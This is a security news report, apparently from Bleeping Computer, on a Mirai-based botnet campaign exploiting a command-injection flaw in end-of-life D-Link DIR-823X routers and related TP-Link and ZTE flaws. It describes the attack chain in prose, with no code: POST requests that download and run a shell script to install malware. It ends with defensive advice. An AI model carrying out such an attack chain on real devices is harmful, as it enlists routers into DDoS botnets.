New Mirai campaign exploits RCE flaw in EoL D-Link routers
Source: Bleeping Computer
Vulnerability Overview
A new Mirai‑based malware campaign is actively exploiting CVE‑2025‑29635, a high‑severity command‑injection vulnerability affecting D‑Link DIR‑823X routers. The flaw allows an attacker to execute arbitrary commands on remote devices by sending a POST request to a vulnerable endpoint, triggering remote command execution (RCE).
The vulnerability was first disclosed 13 months ago by security researchers Wang Jinshuai and Zhao Jiangting. Akamai’s SIRT detected the first in‑the‑wild active exploitation in March 2026.
Exploitation Campaign
Akamai’s SIRT observed attackers sending POST requests that:
- Change directories across writable paths.
- Download a shell script (
dlink.sh) from an external IP. - Execute the script, which installs a Mirai‑based malware named tuxnokill (supports multiple architectures).
The script enables Mirai’s standard DDoS capabilities, including TCP SYN/ACK/STOMP, UDP floods, and HTTP null attacks.
The observed POST requests
Source: Akamai
The researchers who originally disclosed the flaw briefly published a proof‑of‑concept exploit on GitHub, but later retracted it.
Akamai also identified that the same threat actor is exploiting:
- CVE‑2023‑1389 – affecting TP‑Link routers.
- An unnamed RCE flaw in ZTE ZXV10 H108L routers.
All attacks follow the same pattern, culminating in the deployment of the Mirai payload.
Impact and Recommendations
The affected DIR‑823X devices reached end‑of‑life (EoL) in November 2024. Consequently, the latest available firmware likely does not address CVE‑2025‑29635, and D‑Link has indicated it will not issue a patch for this vulnerability.
Recommendations for users of EoL routers:
- Upgrade to a newer router model that receives regular security updates.
- Disable remote administration portals if they are not required.
- Change default admin passwords to strong, unique credentials.
- Monitor router configurations for unexpected changes.
BleepingComputer has reached out to D‑Link for comment on the activity and the status of any fix and will update the article when a response is received.